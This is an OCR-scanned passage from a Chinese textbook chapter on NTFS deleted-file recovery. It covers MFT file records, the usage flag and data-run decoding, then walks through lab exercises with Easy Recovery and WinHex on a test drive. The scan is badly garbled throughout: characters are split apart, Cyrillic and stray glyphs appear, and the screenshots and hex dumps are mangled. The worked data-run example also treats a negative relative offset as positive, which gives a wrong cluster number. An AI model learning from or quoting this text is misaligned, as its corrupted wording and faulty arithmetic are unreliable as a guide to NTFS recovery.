在 NTFS 文件 系统 中 ,磁盘 上 的 所 有 数据 都 是 文件 ,每 个 文件 在 主 文件 表 中 都 有 一 
个 文件 记录 。 在 文件 创建 时 ,在 主 文件 表 中 为 文件 生成 一 个 文件 记录 ; 在 文件 删除 或 者 
系统 格式 化 时 ,并 没有 破坏 磁盘 上 文件 的 数据 信息 ,而 且 文件 记录 也 没有 被 删除 ,只 是 更 
改 标志 ( 偏 移 0x16H) 的 属性 值 ,并 回收 文件 所 占用 的 空间 。 

实现 NTFS 文件 系统 的 数据 恢复 ,通过 分 区 引导 扇 区 的 BPB 表 参 数 定位 主 文件 表 、 
文件 的 文件 记录 ; 分 析 文 件 记录 以 及 记录 中 的 属性 ,获取 数据 恢复 时 所 需要 的 文件 信息 ; 
确定 文件 的 数据 区 地 址 ; 对 删除 文件 进行 恢复 。 

(1) 对 主 文件 表 和 文件 记录 的 定位 。 由 于 文件 是 通过 主 文件 表 的 文件 记录 来 确定 其 
在 文件 数据 区 的 存储 位 置 ,因此 首先 要 找到 主 文件 表 。 主 文件 表 卷 起 始 逻 辑 地 址 一 卷 因 
子 义 当前 卷 的 主 文件 表 逻 辑 篮 号 。 通 过 卷 的 引导 扇 区 的 BPB 参数 ,可 获取 主 文 件 表 和 卷 
因子 信息 。 分 区 引导 扇 区 开始 偏 移 0xDH 为 卷 因子 , 即 每 篮 扇 区 数 ; 偏 移 0x30H HEX 
件 表 在 当前 卷 的 逻辑 地 址 。 

(2) 文件 记录 属性 分 析 。 文 件 记 录 属 性 有 标准 属性 、 文 件 名 属性 、 数 据 流 属性 \ 位 图 
属性 等 类 型 。 记 录 头 偏 移 0x16H 处 为 文件 使 用 标志 ,文件 系统 通过 标志 判断 文件 的 当前 
使 用 状态 ,00 表示 文件 已 删除 ,01 表示 文件 正常 使 用 ,02 表示 文件 夹 已 删除 ,03 表示 文件 
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夹 正常 使 用 。 当 文件 删除 时 ,NTFS 并 不 删除 文件 记录 , 仅 更 改 文 件 记录 的 使 用 标志 值 。 
文件 名 属性 的 类 型 为 30H ,是 常 驻 属 性 ,用 于 存储 文件 名 。 需 要 注意 的 是 ,NTFS 的 文件 
名 采用 Unicode 字符 集 , 可 支持 中 文 和 长 文件 名 , 当 文件 名 含有 超过 传统 DOS“8. 3” 的 长 
文件 名 时 ,文件 记录 会 有 两 个 30H 的 文件 名 属性 ,第 一 个 是 与 DOS 兼容 的 短文 件 名 ,第 
二 个 是 完整 的 长 文件 名 。 通 过 30H 属性 判断 是 否 为 所 需要 恢复 的 文件 。 数 据 流 属性 的 
类 型 为 80H, 其 中 包含 非常 驻 标识 ,起 始 虚拟 簇 号 .结束 虚拟 篮 号 .运行 的 偏 移 数据 的 运 
行 项 等 内 容 。 通 过 分 析 数 据 流 属性 中 运行 的 逻辑 簇 号 和 虚拟 簇 号 ,定位 文件 在 文件 数据 
区 的 位 置 。 

G) 文件 数据 区 的 定位 。 数 据 流 属性 的 开头 为 “80 00 00 00”, 从 属性 头 开 始 第 5 个 
字 节 起 的 4 个 字 节 表示 属性 的 长 度 。 第 8 个 字 节 是 非常 驻 标识 ,如 果 该 值 是 0, 为 常 驻 属 
性 ,表示 数据 流 存储 在 文件 记录 中 ,可 在 文件 记录 中 对 数据 直接 进行 提取 操作 ; 如 果 该 值 
为 1, 说 明 数据 存储 在 运行 中 。 

如 果 文 件数 据 存储 在 文件 记录 中 , 则 第 17 一 第 19 字 节 共 4 个 字 节 表示 文件 数据 长 
Ж.Ж 20 和 第 21 字 节 共 两 个 字 节 表示 起 始 虚 拟 簇 号 。 

如 果 文 件数 据 不 存储 在 文件 记录 中 , 则 第 33 字 节 表示 “数据 运行 ”的 偏 移 地 址 ,一 般 
为 40H, 即 从 属性 头 偏 移 64 字 节 。 从 运行 的 偏 移 处 读 出 数据 运行 ,数据 运行 说 明 各 运行 
项 的 起 始 逻 辑 徐 号 和 该 运行 项 占用 的 簇 数 ,从 而 可 以 定位 每 一 个 数据 段 , 进 而 对 文件 的 数 
据 进行 提取 操作 。 如 果 某 “数据 运行 ”字段 信息 为 “21 09 74 39 31 01 5C A1 0B 31 09 B3 
5E F4”, 表 示 3 个 运行 项 ,依次 为 21: 09 74 39; 31: 01 5C A1 0B; 31: 09 ВЗ 5E F4。 第 
一 个 数据 运行 项 “21: 09 74 39” 中 “21” 表 示 其 后 面 的 3 个 字 节 是 这 个 运行 的 字 节 长 度 ， 
“2” 表 示 后 面 3 个 字 节 中 的 后 2 个 字 节 是 运行 项 的 起 始 簇 号 , 即 运行 的 起 始 簇 号 为 “39 
74”, 颠 倒 过 来 是 因为 高 位 字 节 在 后 ,“1” 表 示 后 面 3 个 字 节 中 第 一 个 字 节 代表 运行 项 长 
度 , 即 运行 项 的 大 小 为 "09”, 所 以 数据 段 实 际 存储 在 起 始 逻 辑 复 号 为 “39 74” 即 14708 Ж 
的 地 方 , 共 "09” 即 9 簇 ,也 即 结 束 逻 辑 簇 号 为 14708 十 8 一 14716 。 

第 二 个 数据 运行 项 为 *31: 01 5C AT 0B”, 同 理 , 后 三 位 “0B A1 5C” 表 示 的 是 下 一 个 
数据 段 起 始 簇 号 ,但 这 个 起 始 簇 号 是 对 于 前 一 个 运行 项 起 始 簇 号 的 相对 值 ,所 以 其 真实 的 
逻辑 簇 号 位 0BA15C 十 3974 二 BDAD0= 二 776912 ,长 度 为 1 个 簇 。 

第 三 个 数据 运行 项 的 起 始 罗 辑 复 号 为 F45EB3 十 BDAD0= 1003983 (十 六 进 制 ) = 
16791939( 十 进 制 ) ,长 度 为 9 个 簇 。 

(4) 保存 恢复 文件 。 通 过 分 析 运 行 项 ,获取 文件 在 文件 数据 区 起 始 和 结束 逻辑 扇 区 
地 址 ,直接 提取 磁盘 扇 区 上 的 二 进 制 数据 保存 到 其 他 卷 上 。 


2.3 FB Easy Recovery 工具 恢复 已 删除 的 文件 实验 


2.3.1 实验 目的 


了 解 Windows 中 已 删除 文件 恢复 的 原理 ,掌握 简单 文件 恢复 工具 Easy Recovery 的 
用 法 。 
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2.3.2 实验 内 容 及 环境 


1. 实验 内 容 

利用 文件 恢复 工具 Easy Recovery 恢复 被 删除 的 文件 。 

2. 实验 环境 

主流 配置 计算 机 一 台 , 安 装 Windows 7 操作 系统 和 Easy Recovery 文件 恢复 软件 。 

Easy Recovery 是 非常 强大 的 硬盘 数据 恢复 工具 ,能 够 恢复 丢失 的 数据 以 及 重建 文件 
系统 ,包括 丢失 的 主 引 导 记 录 (Matser Boot Record) , BIOS 参数 数据 块 .分 区 表 等 。Easy 
Recovery 在 恢复 时 不 会 向 用 户 的 原始 驱动 器 写 入 任何 数据 , 它 的 工作 原理 是 在 内 存 中 重 
建文 件 分 区 表 使 数据 能 够 安全 地 传输 到 其 他 驱动 器 中 。 当 使 用 Easy Recovery 对 损坏 的 
硬盘 进行 修复 时 ,Easy Recovery 使 用 了 Ontrack 公司 复杂 的 模式 识别 技术 找 回 分 布 在 硬 
盘 上 不 同 地 方 的 文件 碎 块 ,并 根据 统计 信息 对 这 些 文件 碎 块 进行 重 整 , 接 着 Easy 
Recovery 在 内 存 中 建立 一 个 虚拟 的 文件 系统 并 列 出 所 有 的 文件 和 目录 ,哪怕 是 整个 分 区 
都 不 可 见 ,或 是 硬盘 上 也 只 有 非常 少 的 分 区 维护 信息 ,Easy Recovery 仍然 可 以 高 质量 地 
找 回 文件 。 

能 用 Easy Recovery 找 回 数据 文件 的 前 提 就 是 硬盘 中 还 保留 有 文件 的 信息 和 数据 
块 。 但 如 果 在 删除 文件 ,格式 化 硬盘 等 操作 后 ,再 在 对 应 分 区 内 写 和 大量 新 信息 时 ,需要 
恢复 的 数据 就 很 有 可 能 被 覆盖 了 ! 这 时 ,无 论 如 何 都 是 找 不 回想 要 的 数据 了 。 所 以 ,为 了 
提高 数据 的 修复 率 , 请 不 要 对 要 修复 的 分 区 或 硬盘 进行 新 的 读 写 操作 ,如 果 要 修复 的 分 区 
恰恰 是 系统 启动 分 区 , 那 就 马上 退出 系统 ,用 另外 一 个 硬盘 来 启动 系统 ( 即 采 用 双 硬 盘 
结构 ) 。 


2.8.8 实验 步骤 


CD 在 EE 盘 新 建 一 个 Word 文件 ,命名 为 “机 密 . doex" ,打开 文件 并 在 文件 中 写 和 测 
试 内 容 “ 这 是 一 个 机 密 文 件 !”" 并 保存 ,使 用 组 合 键 Shift + Delete 删除 测试 文件 “机 密 
. docx", 

(2) 启动 并 运行 Easy Recovery 后 的 初始 界面 ,如 图 2. 2 所 示 , 左 栏 列 出 了 软件 主要 
功能 模块 ,包括 磁盘 诊断 ` 数 据 恢复 .文件 修复 .Email 修复 .软件 升级 .救援 中 心 。 

G) 单 击 左 栏 中 的 “数据 恢复 ”功能 ,在 界面 右 侧 出 现 了 数据 恢复 子 功能 ,包括 高 级 恢 
复 、 删 除 恢复 、 格 式 化 恢复 .Raw 恢复 、 继 续 恢 复 、 紧 急 启动 盘 , 如 图 2. 2 所 示 。 为 了 恢复 
刚刚 删除 的 文件 ,我 们 单 击 “删除 恢复 ”出现 如 图 2. 3 所 示 的 界面 。 

(4) 在 图 2. 3 中 选择 刚刚 删除 的 文件 所 在 的 分 区 ,这 里 选择 下 盘 , 单 击 “ 下 一 步 ” 按 
钮 ,系统 开始 扫描 分 析 E. 盘 中 的 文件 ,罗列 出 EE 盘 中 被 删除 的 文件 ,如 图 2.4 所 示 , 可 以 
看 到 刚刚 删除 的 文件 被 罗列 在 右 侧 窗口 中 ,用 户 可 以 选中 需要 恢复 的 文件 , 单 击 “ 下 一 步 ” 
按钮 ,出 现 如 图 2.5 所 示 界 面 。 

O) 在 如 图 2.5 所 示 界 面 中 选择 文件 恢复 的 路 径 , 注 意 不 要 将 文件 恢复 到 原 路 径 下 ， 
单 击 “下 一 步 ?按钮 ,出现 如 图 2. 6 所 示 的 文件 恢复 成 功 的 界面 ,在 恢复 路 径 下 可 以 看 到 刚 
刚 恢复 的 文件 。 


$25 “数据 恢复 与 安全 删除 ^ 


高 级 恢复 删除 恢复 
SRARVAR ER янки 


文件 修复 


Email 修复 格式 化 恢复 Raw 恢复 
从 格式 化 过 的 卷 中 恢复 忽略 任何 文件 系统 信息 
文件 进行 恢复 


软件 升级 


紧急 启动 盘 
创建 自 引导 紧急 启动 盘 


图 2.3 选择 删除 文件 所 在 分 区 
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从 БЕ T 57 HAER A RERE: 选择 “上 一 步 ” 回 到 选择 分 区 对 


Ое 我 的 驱动 器 

О ES. deck 400 KB 12/12/2018 — D 

[Т Ет на f|] 
lo 字 节 / 0 个 文件 已 标记 кову 个 文件 已 显示 


r 使 用 过 涛 器 过 泥 器 选项 0) | ZRO | 查看 文件 | 


图 2.4 选择 要 恢复 的 文件 界面 


енин Ен ER “下 一 步 ”开始 复制 文件 : 选择 “上 一 步 ” 同 到 标记 恢复 文件 对 


广饶 复 目标 选项 


б шанын [Г а 


C RSE FTP 服务 器 п? 选项 
г еве zip 压缩 文件 р E zip 文件 大 小 限制 0B) 


(КИ 报告 
文件 总 数 : 1 Г 生成 焦 复 报告 
大 小 总 数 : 4.00 KB 


图 2.5 选择 文件 恢复 的 目标 路 径 
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下- “保存 ”以 保存 恢复 摘要 到 文件 。 选择 “上 一 步 ” 同 到 复制 目标 对 


Ontrack EasyRecovery - а 
权 所 有 (C) 2002-2018 Ontrack Data Recovery 有 限 公 司 | 


E 


报告 创建 于 12/12/2018 @ 5:24 PM 
Eron TE 


源 分 区 
1 个 文件 让 之 中 以 进行 恢复 。 
4.00 KB 的 数据 需 恢复 。 


图 2.6 文件 恢复 成 功 界面 


2.4 用 WinHex 恢复 已 删除 文件 实验 
2.4.1 实验 目的 


了 解 Windows NTFS 文件 结构 和 文件 恢复 原理 ,掌握 利用 WinHex 进行 文件 恢复 的 
方法 。 


2.4.2 实验 内 容 及 环境 


1. 实验 内 容 


利用 文件 恢复 工具 WinHex 恢复 被 删除 的 文件 。 
2. 实验 环境 


主流 配置 计算 机 一 台 , 安 装 Windows 7 操作 系统 和 WinHexl5. 1 软件 。 

WinHex 是 一 款 由 德国 X-Ways 公司 开发 的 十 六 进 制 编辑 软件 ,该 软件 是 国内 外 数 
据 恢 复 最 常用 的 软件 ,该 软件 在 Windows 系统 下 运行 ,具有 磁盘 编辑 、 内 存 数据 编辑 、 数 
据 恢复 等 多 种 功能 。 
2.4.3 实验 步骤 


当 文 件 包含 的 数据 量 小 (二 1KB) ,文件 数据 就 会 直接 存储 在 MET 的 文件 记录 中 , 恢 
复 时 从 文件 记录 中 找到 数据 即 可 恢复 。 如 果 文 件 比 较 大 , 则 需要 基于 “数据 运行 ”进行 恢 
复 ,本 实验 演示 小 文件 的 恢复 。 


CD 在 盘 中 创建 一 个 实验. txt" 文件 ,在 里 面 写 和 内容 * 计 算 机 病毒 防护 技术 ”, 文 
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件 删除 前 先 用 WinHex 观察 NTFS 存储 结构 。 
(2) 打开 WinHex, 可 以 看 到 工具 栏 中 有 一 系列 图 标 ,如 图 2. 7 所 示 , 单 击 光盘 状 的 
图 标 ,出 现 如 图 2. 8 所 示 对 话 框 ,选择 需要 打开 的 磁盘 ,这 里 选择 玉 盘 , 单 击 OK 按钮 。 


[ТЇ winHex = 可 国 
НР) RO REO 位 置 P) HEV ТАС) 专家 四 ”选项 (0) FOW EMH 
Ddr = Зз бї» p n ^L ma ^4 €-—GguomP2!&G£»unB 


图 2.7 WinHex 菜单 及 工具 栏 


= Logical Drive Letters 
es (C), НОО 
a5 (D) 
=з 


==» (G), HDD 
& Ё Physical Media 
e HD0: QEMU HARDDISK (4.0 GB) 
2$ QEMU QEMU DVD-ROM 


图 2.8 选择 需要 打开 的 磁盘 


G) 出 现 如 图 2.9 所 示 的 界面 ,WinHex 界面 分 为 三 大 部 分 ,上 半 部 分 是 磁盘 中 的 文 
件 列表 及 每 个 文件 的 信息 ,包括 可 见 的 和 不 可 见 的 文件 。 右 下 部 分 是 磁盘 中 每 个 单位 地 
址 存储 的 十 六 进 制 数据 ,左下 部 分 是 对 右 下 部 分 相应 位 置 的 一 些 说明 。 

(4) 定位 $ MFT 的 起 始 簇 号 。 偏 移 为 0x0D 的 位 置 的 数据 为 0x08 ,说 明 该 文件 系统 
每 复 扇 区 数 为 8。 偏 移 量 为 0x30 的 连续 8 个 字 节 为 C7 63 00 00 00 00 00 00, 说 明 
$ МЕТ 的 起 始 逻 辑 簇 号 为 0x00000000000063C7 ,换算 为 十 进 制 是 25543,25543 х8 = 
204344. BH Jg $ MFT 的 起 始 逻辑 扇 区 号 。 

单 击 菜单 “位 置 ”, 在 出 现 的 子 菜单 中 选择 Go To Sector, 如 图 2. 10 所 示 ,会 弹出 跳 转 
到 指定 簇 或 指定 扇 区 的 界面 ,如 图 2. 11 所 示 。 在 Sector 后 输入 204344 ,或 者 在 Cluster 
后 输入 25543( 两 个 位 置 只 需 输 入 一 个 ,因为 另 一 个 会 由 软件 自动 计算 出 来 ) , 单 击 OK 
按钮 。 

C5) 光标 跳 转 到 指定 的 扇 区 ,该 扇 区 就 是 $MFT 的 起 始 位 置 ,界面 左下 部 分 Alloc. 
of visible drive space 处 的 $MFT(#0) 即 是 证 明 , 如 图 2.12 所 示 。 
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аә File Edit Search Position View Tools Specialist Options Window Help -8X 
Du Ыб  оъато аак о Фе  Әњәыо б «»b18 
Drive С: | Drive E 
М Omin ago 12 files, 3 dir. 
Name = [Ex [  Sue[cemed [Modied __ [Асе __ [Au E] 
[lsExend Асали .....-44B 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH ыы um 
|1 [Root directory) 4.1 KB 2013-02-23 09:31:16 2013-02-23 09:34:02 2013-02-23 09:34:02 SH | 
|E System Volume Information. 296B 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH E 
$AttrDef 25KB 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH | 
‘$6adClus ОВ 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH m 
Bitmap. 34KB 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH 
$Boot 80KB 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH 
$LogFile 30MB 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH 
ЭМЕТ 320KB SH м) 
一 * 
jeegae]| Offset | 0 1 2 3 4 S в 7 8 9101112 13 14 15 [8 
Dive E: SSXlee| 000000000 EB 52 90 4E 54 46 53 20 20 20 20 00 02 08 00 00 &RINC 
Fie system. NTFS| 000000016 00 00 00 00 00 ЕВ 00 00 ЗЕ 00 FF 00 ЗЕ 00 00 00 
Мойте еї NewVolme| 000000032 |00 00 00 00 80 оо 80 00 BC 5A 09 00 00 00 00 00 
Default Edi Mode. 000000048 |C7 63 оо оо 00 оо 00 00 ав 95 оо оо DO DD DD 00 Cc 
Stas: оюла) 000000064 F6 00 00 00 01 00 00 00 65 7B 79 18 B7 79 18 B2 5 
Undo levet 9| 000000080 00 00 00 00 FA 33 CO ВЕ DO BC 00 7C FB B8 CO 07 
Benes "^| 000000096 ВЕ D8 ЕВ 16 00 B8 00 OD 8E CO 33 DB C6 06 OE 00 105 
Alloc. of visible dive space: 000000112 | 10 E8 53 00 68 00 OD 68 6A 02 CB 8A 16 24 00 B4| èS 
Cluster No: o| 000000128 08 CD 13 73 05 B9 FF FF ВА F1 66 OF B6 C6 40 66 Ї = 
$8oot| 000000144 | OF B6 D1 80 E2 ЗЕ F7 E2 86 CD CO ED 06 41 66 OF | SÉ 
M 000000160 B7 C9 66 F7 E1 66 A3 20 00 СЗ B4 41 ВВ АА 55 ВА | -É£- | 
Snapshot taken 0 min. ago | 4i ааа а c c cols cR cci] imi 
Sector 0 of 613048 | Offset 0 2235, Block: n/a, Sie: n/a 


WinH; 


[Drive € 可 区 
М» 文件 器 ”编辑 器 VFO 位 置 P) 视图 VW) IA HRU AMO 窗口 (W) MHW -|8 x 
ПБ Ы 59 ш ÁO 


Offset | 0 1 2 дото РШЕ Record 
000000000 ЕВ 52 30 . gshttt 
000000010 00 00 00 ! 

000000020 00 00 00 14 SED 
000000030 00 00 oc i» #0) 
000000040 F6 00 00 1 #80 
000000050 00 00 00 ! атир 
000000060 8E D8 Ев: MERE Ф) 
000000070 |10 E8 53 ! PARRE W) сык 


000000080 08 CD 13 ` 
000000090 ОЕ pe pi ,. ВЕЖ Ш) 


ВА 16 24 00 B4 .eS.h..hj.EM.$." 
ОЕ B6 C6 40 66 .1.s.1yyIRfE .MEOE 
ED 06 41 66 OF MNIS?-SIIAi Af 


图 2.10 子 菜单 选择 界面 


204344 
г (25543 


图 2.11 ВЕЕ iE GE 3 СС I ЙЫШ 
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Җә File Edit Search Position View Tools Specialist Options Window Help 
D&Gbk&miE:-ucum:asuExMoHme6Suomj &4›ЮПЩШ 
Drive C: | Drive E 
З 2mn ago 12 йез, 3 dir. 
Name =. [єх T Size | Created. Modified [Accessed Jan т 1stsector| | 
$Boot 8.0 KB 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH 0 
$LogFile 3.0 МВ 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH 198184. 
$MFTMir 4.0KB 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH 306520 
$Secure 0B 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH | 
$UpCase 128KB 2013-02-23 09:31:16 2013.02.23 09:31:16 2013-02-23 09:31:16 SH 306648 N 
|) tVolume. 0B 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH 13 
实验 JPG JPG 29KB 2013-02-23 09:34:02 2013-02-23 09:34:02 2013-02-23 09:34:02 А 306528 М 
实验 WW м 18B 2013.02-23 09:32:20 2013-02-23 09:3258 2013-02-23 09:32:58 ІА 204402 ul 
м 
Таса Offset [0 1 2 3 4 5 6 7 8 910 11 12 13 14 15 ^ | 8 
Drive E: Shee 104624128 M6 49 4C 45 30 00 03 00 F9 OE 10 00 00 00 00 00 BILE 
е yolon МТЕЅ | 104624144 01 00 01 00 38 00 01 00 98 01 00 00 00 04 00 00 
porem ko NewVolme| 104624160 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 
Default Edt Mode 104624176 02 00 00 00 00 00 00 00 10 00 00 00 60 00 00 00 ү! 
State: oignal 104624192 | 00 00 18 00 00 00 00 00 48 00 00 00 18 00 00 00 
Undo levet 0| 104624208 | D2 53 6F 79 65 11 CE 01 D2 53 6F 79 65 11 CE 01 | osoy 
олам ак na| 104624224 |D2 53 6F 79 65 11 CE 01 D2 53 6F 79 65 11 CE 01 osoy 
Alloc. of visible dive space: 104624240 06 00 00 00 оо оо оо оо оо 00 оо 00 00 00 00 00 
Chuster No: 25543| 104624256 00 00 00 00 00 01 00 DO 00 00 оо оо оо 00 00 00 
ЗМЕТ (40)| 104624272 | 00 00 00 00 00 00 00 00 30 00 00 00 68 оо 00 00 
\| 104624288 00 00 18 00 00 00 03 00 4A 00 00 00 18 00 01 00 a 
Snapshot taken 2min. ago |481 Mu SEES mv zm ] а 
Sector 204344 of 613048 Оне 104624128 | = 70, Block: n/a, Size: па 


[| 2.12 跳 转 到 MTF 的 起 始 位 置 


(6) 我 们 可 以 在 界面 上 半 部 分 的 文件 列表 中 找 出 $MFT 对 应 的 151 sector 的 值 ,为 
204344, 这 和 我 们 计算 出 的 $MFT 的 起 始 逻辑 扇 区 号 是 相同 的 。 找 到 的 这 个 扇 区 就 是 
第 一 个 元 文件 ,从 这 个 扇 区 开始 往 下 找 , 可 以 找到 文件 “实验 . txt” 的 文件 记录 ,文件 记录 
的 起 始 字符 是 FILE。 根 据 找 $ МЕТ 的 起 始 迎 辑 扇 区 号 积累 的 经 验 , 查 看 文件 列表 中 * 实 
验 . txt? 对 应 的 151 sector 的 值 ,由 图 2. 13 可 知 , 值 为 204402, 试 着 跳 转 到 这 个 扇 区 。 从 
图 2.13 中 可 以 看 出 ,这 个 扇 区 前 四 个 字 节 是 FILE, 且 界面 左下 部 分 Alloc. of visible 
drive space 处 为 “实验 . txt”, 这 说 明 我 们 找到 了 “实验 . txt” 的 文件 记录 。 

(7) 分析“ 实验 . txt” 的 文件 记录 。 

在 图 2. 13 中 ,我 们 以 实验 . txt 的 文件 记录 起 始 扇 区 的 第 一 个 字 节 “46” 为 基准 , 偏 移 
量 为 0xl4 的 连续 两 个 字 节 的 值 为 38 00, 即 为 0x38, 这 说 明文 件 记 录 中 第 一 个 属性 的 偏 
移 地 址 为 0x38。 偏 移 量 为 0x16 的 连续 两 个 字 节 的 值 为 01 00, 即 为 0x01, 说 明文 件 正 在 
使 用 ,没有 被 删除 。 

(D 10H 类 型 属性 。 

在 偏 移 量 为 0x38 的 位 置 ,可 以 看 到 连续 4 个 字 节 为 10 00 00 00, 这 说 明 第 一 个 属性 
是 10H 类 型 属性 ,描述 的 是 标准 信息 。 

如 图 2. 14 所 示 , 以 10H 类 型 属性 起 始 地 址 为 基准 , 偏 移 量 为 0x10 的 连续 四 个 字 节 
的 值 为 48H(4X16 十 8 二 72) ,说 明 该 属性 除 属性 头 之 外 的 长 度 为 72 个 字 节 。 

偏 移 量 为 0x14 的 连续 两 个 字 节 的 值 为 18 了 HH, 说 明 该 属性 开始 的 偏 移 为 0x18。 则 从 
偏 移 量 为 0x18 的 位 置 开始 ,之 后 的 72 个 字 节 是 10H 类 型 属性 的 内 容 。 
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$Boot 80KB 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH 0 
$LogFile 30MB 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH 198184 
SMFT 320KB SH 204344 
3MFTMir. 40KB 20130223 09:31:16 2013-02-23 09:31:16 20130223 09:31:16 SH 306520 | 
$5есше ОВ 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH 

З0рСазе 128 КВ 2013-02-23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH 306648 
Моите 0B 2013:02.23 09:31:16 2013-02-23 09:31:16 2013-02-23 09:31:16 SH 

实验 JP6 РО 29KB 20130223 09:34:02 201 09:34:02 20130223 09:34:02 A 306528 


м 
шейнен Offset | 0 1 2 3 4 5 6 7 8 910 11 12 13 14 15 c a 


Dive:  SS%hee| 104653824 46 49 4C 45 30 00 03 00 60 14 18 00 00 00 00 00| FILEO 

Fiesystem МЕЅ 104653840 01 00 01 00 38 00 01 00 60 01 00 00 00 04 00 00 8 
VohmelsbeNewVohme| 104653856 00 00 00 00 00 00 00 00 06 00 00 00 1D 00 00 00 

Defaut Edt Mode — | 104653872 04 00 00 00 00 00 00 00 10 00 00 00 60 00 00 00 a 
Stae sil! 104653888 00 00 00 00 00 00 00 00 48 00 00 00 18 00 00 00 H 
Undo levet: 0| 104653904 26 DE BF Е 65 11 CE 01 00 01 00 B5 65 11 CE O1 shclei # 


preneran; "^| 104653920 00 01 DO BS 65 11 CE 01 00 01 00 BS 65 11 CE 01 eÍ t 
Aloc. of visible dive space| 104653936 20 00 00 00 00 00 00 O0 00 00 00 00 00 00 00 00 
Cluster No: 25550) 104653952 00 00 00 00 04 01 00 00 00 00 00 00 00 00 00 00 


$MFT (829)! 104653968 00 00 00 00 00 00 00 00 30 00 00 00 68 00 00 00 0 

ASE t| 104653984 00 00 00 00 00 00 04 00 4E 00 00 00 18 00 01 00 N 图 
Snapshot aken 3 min. аро |l i) а 
Sector 204402 of 613048. 1 Offset 104653824 | =70| Block: n/a Size: ma 


图 2.13 跳 转 到 实验 . txt 的 文件 记录 位 置 


Offset 0123456 7 8 9 10 11 12 13 14 15 с |18) 
104653872 |]4 00 00 00 00 00 00 00 10 00 00 00 60 00 00 00 
104653868 00 00 00 00 00 00 00 00 48 00 00 00 18 00 00 00 H 
104653904 26 DE BF 9F 65 11 CE 01 00 01 DO B5 65 11 CE 01| &béle i £ 
104653920 00 01 DO B5 65 11 СЕ 01 00 01 DO BS 65 11 CE 01 ahe i 8) 
104653936 20 00 00 00 00 00 00 00 00 00 00 оо 00 оо 00 00 
104653952 00 00 00 00 04 01 00 00 00 00 00 00 00 00 00 00 


104653968 00 00 00 00 00 00 00 O0 зо 00 оо оо 68 оо 00 00 0 
104653984 00 00 00 00 00 00 04 00 4E 00 00 00 18 00 01 00 N 
104654000 05 00 00 00 00 00 05 00 26 DE BF 9F 65 11 CE 01 &bc 


104654016 |26 DE BF 9F 65 11 CE 01 26 DE BF 9F 65 11 CE 01 | &béle i &k 
104654032 |26 DE BF 9F 65 11 CE 01 00 00 00 00 00 00 00 00 &béle i 8 
Г | | ini 


图 2.14 实验 . txt 的 文件 记录 10H 类 型 属性 


@ 30H 类 型 属性 。 

10H 属性 结束 之 后 的 4 个 字 节 为 30 00 00 00, 这 说 明 第 二 个 属性 是 30H 类 型 属性 ， 
描述 的 是 文件 名 信息 。 

和 对 ТОН 类 型 属性 的 分 析 相 同 , 如 图 2. 15 所 示 , 以 ЗОН 类 型 属性 的 起 始 地 址 为 基 
准 , 在 偏 移 量 0x10 之 后 的 4EH Вр 4164-14 =78 个 字 节 是 30H 类 型 属性 的 内 容 , 偏 移 
Tit 0x14 的 连续 两 个 字 节 的 值 为 18H., 说 明 该 属性 开始 的 偏 移 为 0x18。 这 时 设 属性 内 
容 的 第 一 个 字 节 的 偏 移 为 0x00, 则 偏 移 量 为 0x40 处 的 值 为 0x06, 可 以 知道 文件 名 “实验 
. txt” 的 字符 数 为 6, 且 从 偏 移 量 为 0x42 之 后 的 14 个 字 节 是 文件 的 Unicode LEZ. R 
们 可 以 看 到 ,这 14 个 字 节 所 在 的 一 行 之 后 的 空间 中 有 . txt 这 样 的 符号 ,这 说 明 我 们 的 分 
析 是 正确 的 。 
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Offset | 0 1 2 3 4 5 6 7 в э 10 11 12 13 14 15 Ш 四 


104653968 00 00 00 00 00 O0 00 00 30 00 00 00 68 00 00 00 0 
104653984 00 00 00 00 00 00 04 00 4E 00 00 00 18 00 01 00 N 
104654000 | 05 00 00 00 00 00 05 00 26 DE BF ЭЕ 65 11 CE 01 &bc 


104654016 | 26 DE BF Е 65 11 CE 01 26 DE BF 9F 65 11 CE 01 |&béle Î 5:9) 
104654032 |26 DE BF Е 65 11 СЕ 01 00 00 00 00 00 00 00 00 &b£le i 
104654048 | 00 00 00 00 00 00 00 00 20 00 00 оо оо оо 00 00 

104654064 06 03 9Е 5В 8С 9А 2Е 00 74 00 78 00 74 00 54 00 и. 七: 
104654080 | 40 00 00 00 28 00 00 00 00 00 DO 00 00 оо 05 оо @ ( 
104654096 | 10 00 00 00 18 00 00 00 F2 6B E7 B6 58 7D Е2 11 òkç 
104654112 8С 01 6C 79 99 60 BA AB 80 00 00 00 30 00 00 00 І 1lyl'9«l 
104654128 |00 00 18 00 00 00 01 00 12 00 00 00 18 00 00 00 мі 
图 = "-— 一 =| a 


图 2.15 实验 . txt 的 文件 记录 30H 类 型 属性 


@ 40H 类 型 属性 。 

30H 类 型 属性 的 描述 结束 之 后 的 40 个 字 节 是 40H 类 型 属性 ,分 析 方 法 和 上 面 两 个 
类 型 属性 的 分 析 方 法 相同 ,在 此 不 再 袭 述 。 

Ф 80H 类 型 属性 。 

40H 类 型 属性 的 描述 结束 之 后 的 4 个 字 节 是 80 00 00 00, 这 说 明 此 属性 是 80H 类 型 
属性 ,描述 的 是 文件 的 数据 内 容 。 

如 图 2. 16 所 示 , 以 ЗОН 类 型 属性 的 起 始 地 址 为 基准 , 偏 移 量 为 0x08 的 1 个 字 节 的 
